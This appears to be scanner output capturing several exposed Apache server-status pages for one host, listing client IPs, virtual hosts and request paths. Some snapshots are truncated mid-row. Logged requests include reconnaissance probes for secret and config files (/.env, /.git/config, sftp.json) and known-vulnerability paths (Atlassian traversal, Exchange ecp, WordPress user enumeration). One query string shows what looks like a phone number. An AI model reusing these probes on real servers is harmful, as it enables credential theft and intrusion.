Apache Status Apache Server Status for nomad.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Tuesday, 12-Dec-2023 18:05:08 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 16 minutes 47 seconds Server load: 1.12 0.80 0.33 Total accesses: 561 - Total Traffic: 7.4 MB CPU Usage: u4.8 s.56 cu0 cs0 - .532% CPU load .557 requests/sec - 7.6 kB/second - 13.6 kB/request 2 requests currently being processed, 178 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0105929no0yes018000 1105930no0yes018000 2105935no0yes018000 3105950no1yes018010 4105973no0yes018000 5106002no0yes018000 6106024no0yes018000 7106043no3yes117030 8106065no3yes117020 9107415no0yes018000 Sum1007 2178060 ________________________________________________________________ ________________________________________________________________ _____W__________W___________________________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-01059290/1/1_ 0.0016990.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.2516600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659171652209 HT 0-01059290/1/1_ 0.0516610.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.279410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/1/1_ 0.059400.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.15300.00.000.00 168.143.243.15http/1.1 0-01059290/2/2_ 0.16100.00.000.00 168.143.243.26http/1.1 0-01059290/2/2_ 0.1745410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/2/2_ 0.1934600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1658991508186 HT 0-01059290/1/1_ 0.0825600.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2322600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659111594735 HT 0-01059290/1/1_ 0.0922600.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2516910.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.05824620.00.020.02 65.211.109.20http/1.1veew.info:443GET /?1XJ&phn=6178693528 HTTP/1.1 1-01059300/1/1_ 0.058232170.00.000.00 65.211.109.20http/1.1veew.info:443POST /ajax.php HTTP/1.1 1-01059300/1/1_ 0.1257900.00.000.00 217.34.133.56http/1.1rewurds.info:80GET /wp-login.php HTTP/1.1 1-01059300/1/1_ 0.1742410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.19367110.00.040.04 99.32.168.66http/1.1veew.info:443GET /js/jquery.min.js HTTP/1.1 1-01059300/1/1_ 0.2613480.00.000.00 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-01059350/1/1_ 0.03380.00.000.00 168.143.243.31http/1.1 2-01059350/1/1_ 0.04290.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.06210.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.14210.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.18210.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.18110.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.22010.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.2611810.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 3-01059500/3/3_ 0.34100.00.080.08 168.143.243.26http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-01059500/2/2_ 0.18190.00.000.00 168.143.243.26http/1.1 3-01059500/2/2_ 0.33100.00.010.01 168.143.243.26http/1.1 3-01059500/3/3_ 0.33100.00.010.01 168.143.243.30http/1.1 3-01059500/2/2_ 0.33100.00.070.07 168.143.243.30http/1.1 3-01059500/1/1_ 0.23080.00.010.01 168.143.243.26http/1.1 3-01059500/3/3_ 0.34200.00.010.01 168.143.243.26http/1.1trmm.us:443GET /.git/config HTTP/1.1 3-01059500/2/2_ 0.34200.00.000.00 168.143.243.26http/1.1trmm.us:443GET /s/333323e22343e23353e23323/_/;/META-INF/maven/com.atlassia 3-01059500/3/3_ 0.34200.00.000.00 168.143.243.26http/1.1trmm.us:443GET /s/0383e23343e23353e23323/_/;/META-INF/maven/com.atlassian. 3-01059500/1/1_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /config.json HTTP/1.1 3-01059500/3/3_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /config.json HTTP/1.1 3-01059500/3/3_ 0.34100.00.080.08 168.143.243.26http/1.1trmm.us:443GET /telescope/requests HTTP/1.1 3-01059500/3/3_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /telescope/requests HTTP/1.1 3-01059500/2/2_ 0.32100.00.000.00 168.143.243.30http/1.1 3-01059500/2/2_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-01059500/1/1_ 0.18180.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.20000.00.010.01 168.143.243.26http/1.1 4-01059730/2/2_ 0.20100.00.010.01 168.143.243.30http/1.1 4-01059730/1/1_ 0.20100.00.000.00 168.143.243.30http/1.1 4-01059730/1/1_ 0.21100.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21100.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21100.00.000.00 168.143.243.26http/1.1 4-01059730/1/1_ 0.21100.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21000.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.21090.00.070.07 168.143.243.30http/1.1<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb319b9594879b959487cdcb26a0
Apache Status Apache Server Status for nomad.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Monday, 19-Jun-2023 14:41:29 UTC Restart Time: Monday, 12-Jun-2023 11:39:44 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 7 days 3 hours 1 minute 45 seconds Server load: 0.33 0.27 0.15 Total accesses: 863201 - Total Traffic: 13.4 GB CPU Usage: u768.69 s184.11 cu0 cs0 - .155% CPU load 1.4 requests/sec - 22.8 kB/second - 16.3 kB/request 5 requests currently being processed, 175 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 011301no0yes018000 19522no0yes018000 2122076no0yes018000 324195no9yes414060 421293no1yes018010 582938no2yes018020 6113967no0yes018000 794980no1yes018010 9107391no0yes018000 11114344no1yes117000 Sum10014 51750100 ______________________________________________________W________R W____W__________________________________________________________ ________________..................__________________............ ......_W________________........................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0113010/317/4598_ 52.00200.04.3448.55 168.143.243.30http/1.1 0-0113010/317/4621_ 52.0528210.03.4748.43 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0113010/306/4627_ 51.235180.02.1544.19 168.143.243.31http/1.1 0-0113010/327/4663_ 52.00200.02.2846.17 168.143.243.26http/1.1 0-0113010/322/4644_ 52.0626130.04.6562.66 23.205.108.69http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/314/4574_ 51.755160.01.4142.44 168.143.243.15http/1.1 0-0113010/300/4566_ 52.0941230.01.3650.23 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/310/4575_ 52.017200.03.6162.27 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/mod-tools-forward-1.0.js HTTP/1.1 0-0113010/311/4566_ 52.1141220.01.5655.62 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/322/4636_ 51.9841290.01.2959.97 168.143.243.31http/1.1 0-0113010/312/4641_ 52.1041190.08.2355.58 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/315/4596_ 51.8966160.01.8545.26 96.7.74.180http/1.1 0-0113010/320/4659_ 51.98400.03.1047.30 168.143.243.31http/1.1 0-0113010/314/4611_ 52.017240.02.3335.63 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/lylt.js?20201222 HTTP/1.1 0-0113010/329/4647_ 52.004120.06.4653.03 168.143.243.26http/1.1 0-0113010/320/4679_ 52.0438140.05.7158.77 96.7.74.180http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/319/4612_ 52.00160.04.7361.05 168.143.243.30http/1.1 0-0113010/312/4585_ 51.932774480.03.2143.38 23.205.108.88http/1.1 1-095220/205/2850_ 21.57090.01.0032.88 168.143.243.26http/1.1 1-095220/208/2791_ 21.761140.01.1838.56 168.143.243.30http/1.1 1-095220/208/2823_ 21.761150.01.1132.33 168.143.243.30http/1.1 1-095220/200/2775_ 21.57080.02.6233.41 168.143.243.30http/1.1 1-095220/205/2756_ 21.7611650.01.4824.13 168.143.243.30http/1.1 1-095220/213/2821_ 21.61100.01.5828.78 168.143.243.30http/1.1 1-095220/220/2830_ 21.710110.01.6523.57 168.143.243.30http/1.1 1-095220/199/2810_ 21.57000.03.9835.41 168.143.243.26http/1.1 1-095220/206/2840_ 21.761150.01.4531.69 168.143.243.26http/1.1 1-095220/203/2806_ 21.750160.04.0043.00 168.143.243.30http/1.1 1-095220/210/2816_ 21.71020.01.4037.52 168.143.243.26http/1.1 1-095220/199/2793_ 21.750110.08.4739.67 168.143.243.30http/1.1 1-095220/201/2796_ 21.57090.01.0030.80 168.143.243.30http/1.1 1-095220/207/2780_ 21.740103440.05.3646.10 168.143.243.30http/1.1 1-095220/203/2809_ 21.62000.04.2546.81 168.143.243.26http/1.1 1-095220/204/2789_ 21.740150.02.2841.49 168.143.243.30http/1.1 1-095220/204/2834_ 21.761140.05.5436.71 168.143.243.30http/1.1 1-095220/210/2812_ 21.63020.01.2425.84 168.143.243.26http/1.1 2-01220760/394/3123_ 42.98410.05.0330.70 168.143.243.15http/1.1 2-01220760/389/3077_ 42.9751220.05.7654.00 168.143.243.31http/1.1 2-01220760/391/3057_ 42.99260.05.5535.73 168.143.243.30http/1.1 2-01220760/380/3028_ 42.89121910.03.0425.00 168.143.243.30http/1.1 2-01220760/385/3058_ 42.984330.03.7826.24 168.143.243.15http/1.1 2-01220760/404/3088_ 42.900750.03.7921.42 168.143.243.30http/1.1 2-01220760/383/3037_ 42.51500.01.9831.05 168.143.243.31http/1.1 2-01220760/384/3031_ 42.661780.04.1733.73 168.143.243.26http/1.1 2-01220760/369/3021_ 42.90120.07.5843.21 168.143.243.30http/1.1 2-01220760/391/3077_ 42.51500.09.4232.63 168.143.243.15http/1.1 2-01220760/392/3117_ 42.910140.03.9424.64 168.143.243.30http/1.1 2-01220760/384/3025_ 42.95520.012.4148.25 168.143.243.15http/1.1 2-01220760/394/3088_ 42.975320.05.1327.47 168.143.243.15http/1.1 2-01220760/377/3023_ 42.910160.05.0234.70 168.143.243.30http/1.1 2-01220760/382/2988_ 42.900150.05.2042.40 168.143.243.30http/1.1 2-01220760/377/3028_ 43.061722350.07.3438.44 104.14.61.112http/1.1trmm.us:443POST /s/ HTTP/1.1 2-01220760/397/3099_ 42.98240.06.4526.98 168.143.243.30http/1.1 2-01220760/383/3069
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb319b9594879b9594875e7a34ee
Apache Status Apache Server Status for nomad.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Monday, 19-Jun-2023 14:41:29 UTC Restart Time: Monday, 12-Jun-2023 11:39:44 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 7 days 3 hours 1 minute 45 seconds Server load: 0.33 0.27 0.15 Total accesses: 863188 - Total Traffic: 13.4 GB CPU Usage: u768.59 s184.11 cu0 cs0 - .155% CPU load 1.4 requests/sec - 22.8 kB/second - 16.3 kB/request 5 requests currently being processed, 175 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 011301no0yes018000 19522no0yes018000 2122076no0yes018000 324195no8yes414060 421293no1yes018010 582938no2yes018020 6113967no0yes018000 794980no1yes018010 9107391no0yes018000 11114344no1yes117000 Sum10013 51750100 ______________________________________________________W_____R__W _____W__________________________________________________________ ________________..................__________________............ ......_W________________........................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0113010/317/4598_ 52.00100.04.3448.55 168.143.243.30http/1.1 0-0113010/317/4621_ 52.0528210.03.4748.43 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0113010/306/4627_ 51.234180.02.1544.19 168.143.243.31http/1.1 0-0113010/327/4663_ 52.00100.02.2846.17 168.143.243.26http/1.1 0-0113010/322/4644_ 52.0626130.04.6562.66 23.205.108.69http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/314/4574_ 51.754160.01.4142.44 168.143.243.15http/1.1 0-0113010/300/4566_ 52.0941230.01.3650.23 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/310/4575_ 52.017200.03.6162.27 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/mod-tools-forward-1.0.js HTTP/1.1 0-0113010/311/4566_ 52.1141220.01.5655.62 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/322/4636_ 51.9841290.01.2959.97 168.143.243.31http/1.1 0-0113010/312/4641_ 52.1041190.08.2355.58 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/315/4596_ 51.8966160.01.8545.26 96.7.74.180http/1.1 0-0113010/320/4659_ 51.98400.03.1047.30 168.143.243.31http/1.1 0-0113010/314/4611_ 52.017240.02.3335.63 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/lylt.js?20201222 HTTP/1.1 0-0113010/329/4647_ 52.004120.06.4653.03 168.143.243.26http/1.1 0-0113010/320/4679_ 52.0437140.05.7158.77 96.7.74.180http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/319/4612_ 52.00060.04.7361.05 168.143.243.30http/1.1 0-0113010/312/4585_ 51.932774480.03.2143.38 23.205.108.88http/1.1 1-095220/205/2850_ 21.57090.01.0032.88 168.143.243.26http/1.1 1-095220/208/2791_ 21.761140.01.1838.56 168.143.243.30http/1.1 1-095220/208/2823_ 21.761150.01.1132.33 168.143.243.30http/1.1 1-095220/200/2775_ 21.57080.02.6233.41 168.143.243.30http/1.1 1-095220/205/2756_ 21.7611650.01.4824.13 168.143.243.30http/1.1 1-095220/213/2821_ 21.61000.01.5828.78 168.143.243.30http/1.1 1-095220/220/2830_ 21.710110.01.6523.57 168.143.243.30http/1.1 1-095220/199/2810_ 21.57000.03.9835.41 168.143.243.26http/1.1 1-095220/206/2840_ 21.761150.01.4531.69 168.143.243.26http/1.1 1-095220/203/2806_ 21.751160.04.0043.00 168.143.243.26http/1.1 1-095220/210/2816_ 21.71020.01.4037.52 168.143.243.26http/1.1 1-095220/199/2793_ 21.751110.08.4739.67 168.143.243.26http/1.1 1-095220/201/2796_ 21.57090.01.0030.80 168.143.243.30http/1.1 1-095220/207/2780_ 21.741103440.05.3646.10 168.143.243.26http/1.1 1-095220/203/2809_ 21.62000.04.2546.81 168.143.243.26http/1.1 1-095220/204/2789_ 21.740150.02.2841.49 168.143.243.30http/1.1 1-095220/204/2834_ 21.760140.05.5436.71 168.143.243.30http/1.1 1-095220/210/2812_ 21.63020.01.2425.84 168.143.243.26http/1.1 2-01220760/394/3123_ 42.98410.05.0330.70 168.143.243.15http/1.1 2-01220760/389/3077_ 42.9741220.05.7654.00 168.143.243.31http/1.1 2-01220760/391/3057_ 42.99260.05.5535.73 168.143.243.30http/1.1 2-01220760/380/3028_ 42.89121910.03.0425.00 168.143.243.30http/1.1 2-01220760/385/3058_ 42.984330.03.7826.24 168.143.243.15http/1.1 2-01220760/404/3088_ 42.900750.03.7921.42 168.143.243.30http/1.1 2-01220760/383/3037_ 42.51400.01.9831.05 168.143.243.31http/1.1 2-01220760/384/3031_ 42.660780.04.1733.73 168.143.243.26http/1.1 2-01220760/369/3021_ 42.90120.07.5843.21 168.143.243.30http/1.1 2-01220760/391/3077_ 42.51500.09.4232.63 168.143.243.15http/1.1 2-01220760/392/3117_ 42.9138140.03.9424.64 127.0.0.1http/1.1 2-01220760/384/3025_ 42.95420.012.4148.25 168.143.243.15http/1.1 2-01220760/394/3088_ 42.974320.05.1327.47 168.143.243.15http/1.1 2-01220760/377/3023_ 42.910160.05.0234.70 168.143.243.30http/1.1 2-01220760/382/2988_ 42.900150.05.2042.40 168.143.243.30http/1.1 2-01220760/377/3028_ 43.061622350.07.3438.44 104.14.61.112http/1.1trmm.us:443POST /s/ HTTP/1.1 2-01220760/397/3099_ 42.98240.06.4526.98 168.143.243.30http/1.1 2-01220760/383/3069
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb319b9594879b9594870c115da0
Apache Status Apache Server Status for nomad.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Friday, 24-Mar-2023 15:50:25 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 51 days 21 hours 37 minutes 26 seconds Server load: 0.24 0.20 0.23 Total accesses: 8186387 - Total Traffic: 207.0 GB CPU Usage: u1337.92 s208.81 cu0 cs0 - .0345% CPU load 1.83 requests/sec - 48.4 kB/second - 26.5 kB/request 18 requests currently being processed, 180 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 098730no13yes4140110 123840no4yes315001 286508no3yes216010 3109764no3yes117030 4116801no3yes117020 533086no1yes117000 621767no9yes414070 7125209no1yes117010 8115169no0yes018000 943856no0yes018000 10129613no3yes117011 Sum11040 181800262 WW________W__L_____W______R________W_R______R_______________W___ ______________W__________________W____________R_W___W______W____ ______________W_________________________________________________ _W____.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0987300/214/40350_ 18.06000.03.70868.71 96.7.74.175http/1.1localhost:80GET /.env HTTP/1.1 0-0987300/250/40344W 18.03000.03.87867.78 96.7.74.175http/1.1localhost:80GET /info.php HTTP/1.1 0-0987300/263/40559_ 18.04000.02.13988.52 96.7.74.175http/1.1localhost:80GET /v2/_catalog HTTP/1.1 0-0987300/227/40523_ 18.05000.01.22854.96 96.7.74.175http/1.1localhost:80GET /api/search?folderIds=0 HTTP/1.1 0-0987300/229/40328_ 18.03000.01.14924.78 96.7.74.175http/1.1trmm.us:80GET /api/search?folderIds=0 HTTP/1.1 0-0987300/249/40611_ 18.050150.04.53963.22 23.223.149.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0987300/249/40600_ 18.050190.04.04887.13 23.220.96.151http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0987300/252/40505_ 18.03000.01.44781.02 96.7.74.175http/1.1trmm.us:80GET /v2/_catalog HTTP/1.1 0-0987300/242/40609_ 18.05000.03.97985.88 96.7.74.175http/1.1localhost:80GET /about HTTP/1.1 0-0987300/226/40499_ 18.06000.01.25830.93 96.7.74.198http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0987300/243/40326W 17.111900.01.78862.20 173.218.126.144http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0987300/223/40300_ 18.04000.01.14835.99 96.7.74.198http/1.1localhost:80GET /about HTTP/1.1 0-0987300/220/40508_ 18.05000.01.56867.49 96.7.74.175http/1.1localhost:80GET / HTTP/1.1 0-0987300/242/40378_ 18.06000.01.45907.12 96.7.74.198http/1.1localhost:80GET /.vscode/sftp.json HTTP/1.1 0-0987300/232/40494_ 18.05000.01.16854.63 96.7.74.175http/1.1localhost:80GET /v2/_catalog HTTP/1.1 0-0987300/229/40501_ 18.040440.03.98940.84 96.7.74.198http/1.1localhost:80GET /info.php HTTP/1.1 0-0987300/237/40616_ 18.06000.04.06843.94 96.7.74.175http/1.1localhost:80GET /debug/default/view?panel=config HTTP/1.1 0-0987300/216/40453_ 18.05000.04.03869.38 96.7.74.198http/1.1localhost:80GET /config.json HTTP/1.1 1-0238400/573/38292_ 101.89400.011.38900.78 96.7.74.175http/1.1 1-0238400/568/38079W 101.61100.07.84873.27 174.240.149.27http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0238400/556/38211_ 101.85400.06.69830.09 96.7.74.198http/1.1 1-0238400/555/38140_ 101.835120.08.98911.73 96.7.74.198http/1.1 1-0238400/560/38206_ 101.54520.011.57932.12 96.7.74.175http/1.1 1-0238400/559/38023_ 102.003160.07.38887.80 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/561/38116_ 101.58500.014.07862.88 96.7.74.198http/1.1 1-0238400/554/37985_ 101.624850.09.89870.97 96.7.74.175http/1.1 1-0238400/556/38061R 101.55514710.014.24839.78 174.240.149.27http/1.1veew.info:443 1-0238400/555/38086_ 101.535280.013.251003.70 96.7.74.175http/1.1 1-0238400/555/38251_ 101.505120.04.23926.34 96.7.74.198http/1.1 1-0238400/575/38143_ 101.84500.031.07889.47 96.7.74.175http/1.1 1-0238400/561/38046_ 101.815140.09.68868.67 96.7.74.175http/1.1 1-0238400/564/38123_ 101.46510.09.13900.16 96.7.74.198http/1.1 1-0238400/563/38049_ 101.85500.09.13926.43 96.7.74.198http/1.1 1-0238400/566/38172_ 101.994210.010.31802.25 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/548/38088_ 101.87500.010.46890.34 96.7.74.198http/1.1 1-0238400/559/38057W 101.462700.06.08925.07 76.170.153.107http/1.1trmm.us:443POST /s/ HTTP/1.1 2-0865080/185/38922_ 34.43500.06.42870.80 96.7.74.198http/1.1 2-0865080/186/38923R 34.29500.013.07881.75 174.240.149.27http/1.1 2-0865080/196/39006_ 34.56000.08.18943.61 96.7.74.198http/1.1localhost:80GET /login.action HTTP/1.1 2-0865080/185/38748_ 34.31500.07.62899.51 96.7.74.198http/1.1 2-0865080/198/38908_ 34.54010.07.15850.79 96.7.74.198http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0865080/190/38922_ 34.20510.01.46910.16 96.7.74.198http/1.1 2-0865080/196/38918_ 34.57000.05.34888.25 96.7.74.198http/1.1localhost:80GET /.git/config HTTP/1.1 2-0865080/192/38694_ 33.934180.011.97831.82 96.7.74.175http/1.1 2-0865080/193/38920R 33.645170.04.73823.40 195.211.77.140http/1.1client.simplismarter.com:443 2-0865080/188/38769_ 34.54000.07.15858.15 96.7.74.198http/1.1localhost:80GET /.git/config HTTP/1.1 2-0865080/196/38939_ 34.105150.06.96894.75 96.7.74.198http/1.1 2-0865080/194/38873_ 34.20510.04.42923.07 96.7.74.198http/1.1 2-0865080/186/38880_ 34.085269230.02.487031.41 96.7.74.198http/1.1 2-0865080/193/38858
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb319b9594879b95948799f9373b
Apache Status Apache Server Status for nomad.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Friday, 24-Mar-2023 15:50:25 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 51 days 21 hours 37 minutes 26 seconds Server load: 0.24 0.20 0.23 Total accesses: 8186278 - Total Traffic: 207.0 GB CPU Usage: u1337.5 s208.72 cu0 cs0 - .0345% CPU load 1.83 requests/sec - 48.4 kB/second - 26.5 kB/request 12 requests currently being processed, 186 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 098730no1yes117000 123840no4yes315001 286508no2yes216000 3109764no0yes018000 4116801no2yes117000 533086no1yes117000 621767no4yes315010 7125209no0yes018000 8115169no0yes018000 943856no0yes018000 10129613no2yes117010 Sum11016 12186021 __________W________W______R________W_R______R___________________ ______________W__________________W__________W_R_W_______________ ________________________________________________________________ _W____.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0987300/210/40346_ 17.91300.03.69868.70 96.7.74.175http/1.1crm.sprout.online:443GET /telescope/requests HTTP/1.1 0-0987300/247/40341_ 17.91300.03.87867.78 96.7.74.175http/1.1crm.sprout.online:443GET /info.php HTTP/1.1 0-0987300/260/40556_ 17.92200.02.13988.51 96.7.74.198http/1.1crm.textripple.com:443GET /scss/.DS_Store HTTP/1.1 0-0987300/224/40520_ 17.92200.01.22854.96 96.7.74.175http/1.1crm.sprout.online:443GET /info.php HTTP/1.1 0-0987300/226/40325_ 17.91300.01.14924.77 96.7.74.175http/1.1crm.sprout.online:443GET /s/0373e2236313e26333e23323/_/;/META-INF/maven/com.atlassia 0-0987300/246/40608_ 17.92200.04.53963.21 96.7.74.175http/1.1crm.textripple.com:443GET /videos/.DS_Store HTTP/1.1 0-0987300/246/40597_ 17.92200.04.03887.13 96.7.74.175http/1.1crm.textripple.com:443GET /videos/.DS_Store HTTP/1.1 0-0987300/249/40502_ 17.91200.01.43781.01 96.7.74.175http/1.1crm.textripple.com:443GET /test/.DS_Store HTTP/1.1 0-0987300/239/40606_ 17.91200.03.94985.86 96.7.74.198http/1.1crm.textripple.com:443GET /mods/.DS_Store HTTP/1.1 0-0987300/222/40495W 17.90000.01.25830.92 96.7.74.198http/1.1localhost:80GET /telescope/requests HTTP/1.1 0-0987300/243/40326W 17.111800.01.78862.20 173.218.126.144http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0987300/221/40298_ 17.92200.01.11835.96 96.7.74.198http/1.1crm.textripple.com:443GET /tmp/.DS_Store HTTP/1.1 0-0987300/217/40505_ 17.922810.01.55867.49 23.223.149.133http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0987300/238/40374_ 17.90300.01.45907.11 96.7.74.198http/1.1crm.textripple.com:443GET /scss/.DS_Store HTTP/1.1 0-0987300/229/40491_ 17.92200.01.16854.63 96.7.74.175http/1.1crm.textripple.com:443GET /test/.DS_Store HTTP/1.1 0-0987300/227/40499_ 17.91200.03.95940.81 96.7.74.198http/1.1crm.textripple.com:443GET /tmp/.DS_Store HTTP/1.1 0-0987300/233/40612_ 17.90300.04.05843.94 96.7.74.175http/1.1crm.textripple.com:443GET /mobile/.DS_Store HTTP/1.1 0-0987300/213/40450_ 17.91200.04.02869.37 96.7.74.175http/1.1crm.textripple.com:443GET /pdfs/.DS_Store HTTP/1.1 1-0238400/573/38292_ 101.89400.011.38900.78 96.7.74.175http/1.1 1-0238400/568/38079W 101.61100.07.84873.27 174.240.149.27http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0238400/556/38211_ 101.85400.06.69830.09 96.7.74.198http/1.1 1-0238400/555/38140_ 101.834120.08.98911.73 96.7.74.198http/1.1 1-0238400/560/38206_ 101.54420.011.57932.12 96.7.74.175http/1.1 1-0238400/559/38023_ 102.002160.07.38887.80 